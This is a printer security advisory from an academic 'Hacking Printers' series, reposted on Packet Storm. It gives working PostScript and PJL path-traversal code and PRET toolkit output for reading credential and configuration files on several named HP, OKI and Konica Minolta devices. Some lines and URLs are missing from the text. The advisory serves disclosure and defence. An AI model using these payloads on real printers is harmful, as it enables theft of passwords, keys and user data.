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packetstormJens MuellerPACKETSTORM:140813
HistoryJan 31, 2017 - 12:00 a.m.

Hacking Printers Advisory 2

Jens Mueller





`TL;DR: In the scope of academic research on printer security, various  
vulnerabilities in network printers and MFPs have been discovered. This  
is advisory 2 of 6 of the `Hacking Printers' series. Each advisory  
discusses multiple issues of the same category. This post is about  
accessing a printers file system through ordinary PostScript or PJL  
based print jobs -- since decades a documented feature of both  
languages. The attack can be performed by anyone who can print, for  
example through USB or network. It can even be carried out by a  
malicious website, using advanced cross-site printing techniques in  
combination with a novel technique we call `CORS spoofing' (see  
============[ File System Access with PostScript and PJL ]============  
-------------------------[ Affected Devices ]-------------------------  
Various printers are likely to be affected as the weakness is based on  
PostScript and PJL, two generic printing languages supported by most  
laser printers. In a test with 20 printers, a vast majority allowed  
access to the file system using PostScript, however it was sandboxed to  
a certain directory on most printers, which limits the impact. Devices  
that are vulnerable to path traversal or where we could obtain sensitive  
information are listed below:  
- HP LaserJet 4200N (Firmware version: 20050602)  
- HP LaserJet 4250N (Firmware version: 20150130)  
- OKI MC342dn (Firmware version: A12.80_0_5)  
- Konica Minolta bizhub C454e (Firmware: unknown)  
Vendors informed: 2016-10-17  
--------------------[ Vulnerability Description ]---------------------  
PJL and PostScript both offer legitimate file operations. On some  
LaserJets, the whole file system can be accessed. This is a known issue  
(see CVE-2010-4107 and CVE-2012-5221). In the HPSBPI02575 security  
bulletin, HP promotes disabling file system access and setting a PJL  
password as countermeasures. PJL passwords however can be cracked within  
minutes due to their limited key size (1..65535). For PostScript, the  
issue has been fixed in current firmware versions by limiting file  
system access to a certain directory. The protection mechanism however  
is flawed: By using %*% as disk prefix and replacing ../ with .././ the  
whole file system can be accessed even for the latest firmware versions.  
The impact is significant: Passwords for the embedded web server can be  
found in /dev/rdsk_jdi_cfg0 while raw access to the RAM device available  
via /dev/dsk_ram0. Proof-of-concept PostScript code tested on the HP  
LaserJet 4250N is given below. It can be deployed to the printer using  
netcat (`nc printer 9100').  
/str 256 string def (%*%.././../../**)  
{print (\n) print} str filenameforall  
/byte (0) def  
/infile (%*%.././../../dev/rdsk_jdi_cfg0) (r) file def  
{ infile read {byte exch 0 exch put  
(%stdout) (w) file byte writestring}  
{infile closefile exit} ifelse  
} loop  
The HP LaserJet 4250N furthermore contains a file named  
webServer/config/soe.xml which holds the password to a user-set email  
account for sending/receiving status information. Proof-of-concept PJL  
code is given below (replace X by the size of the soe.xml file which is  
obtained from the directory listing). Again, netcat can be used to  
deploy the code to port 9100 of the printer.  
@PJL FSDIRLIST NAME="0:\webServer\config" ENTRY=1 COUNT=65535  
@PJL FSUPLOAD NAME="0:\webServer\config\soe.xml" OFFSET=0 SIZE=X  
<listener name="email" port="110" secure="false"  
<pop3server server=""/>  
<username user="someone"/>  
<password pwd="S3cret"/>  
The OKI MC342dn allows one level of path traversal, where a directory  
called `hidden' is located which contains stored fax numbers, email  
contacts and local users' PINs as well as the SNMP community string and  
password. If the MFP is integrated into a network using features like  
Email-to-Print or Scan-to-FTP the `hidden' directory also holds  
passwords for LDAP, POP3, SMTP, out-bound HTTP proxy, FTP, SMB and  
Webdav as well as the IPsec and Wi-Fi pre-shared keys. Example  
PostScript code is given below.  
/str 256 string def (%*%../hidden/*)  
{print (\n) print} str filenameforall  
/byte (0) def  
(r) file def  
{ infile read {byte exch 0 exch put  
(%stdout) (w) file byte writestring}  
{infile closefile exit} ifelse  
} loop  
Note that the `hidden' directory on the OKI MC342dn does not appear in  
PJL directory listings, however it can be accessed as in PostScript once  
the name is known. Example PJL code is given below (where X is the  
correct file size obtained from the directory listing).  
@PJL FSDIRLIST NAME="0:/../hidden/system" ENTRY=1 COUNT=65535  
@PJL FSUPLOAD NAME="0:/../hidden/system/ippuser.dat" OFFSET=0 SIZE=X  
On the Konica Minolta bizhub C454e, the contents of the root directory  
can be listed using path traversal.  
@PJL FSDIRLIST NAME="0:/../../.." ENTRY=1 COUNT=65535  
In addition, the file ../sysdata/acc/job.csv can be read/written, which  
contains logged print job metadata, including document titles and  
usernames (X, again, is the correct file size obtained from the  
directory listing).  
@PJL FSQUERY NAME="0:/../sysdata/acc"  
@PJL FSUPLOAD NAME="0:/../sysdata/acc/job.csv" OFFSET=0 SIZE=X  
-------------------------[ Proof of Concept ]-------------------------  
To simplify PostScript and PJL based file system access on printers, a  
Python based proof of concept software entitled Printer Exploitation  
Toolkit (PRET) has been published. It can be used as follows:  
$ git clone  
$ cd PRET  
$ ./ -q printer ps  
Connection to printer established  
Welcome to the pret shell. Type help or ? to list commands.  
printer:/> ls ../..  
d - Jan 1 1970 (created Jan 1 1970) bootdev  
d - Jan 1 1970 (created Jan 1 1970) dsk_jdi  
d - Jan 1 1970 (created Jan 1 1970) dsk_jdi_ss  
d - Jan 1 1970 (created Jan 1 1970) dsk_ram0  
d - Jan 1 1970 (created Jan 1 1970) etc  
d - Jan 1 1970 (created Jan 1 1970) tmp  
d - Jan 1 1970 (created Jan 1 1970) webServer  
The directory listing is obtained from a HP LaserJet 4200N printer.  
Arbitrary files can be uploaded and downloaded. Similar functionality  
can be achieved using PRET in PJL mode:  
$ ./ -q printer pjl  
Connection to printer established  
Welcome to the pret shell. Type help or ? to list commands.  
printer:/> ls ..  
d - bootdev  
d - dsk_jdi  
d - dsk_jdi_ss  
d - dsk_ram0  
d - etc  
d - lrt  
d - tmp  
d - webServer  
d - xps  
-----------------------[ Further Information ]------------------------  
Information on this bug/feature of PostScript and PJL can be found at:  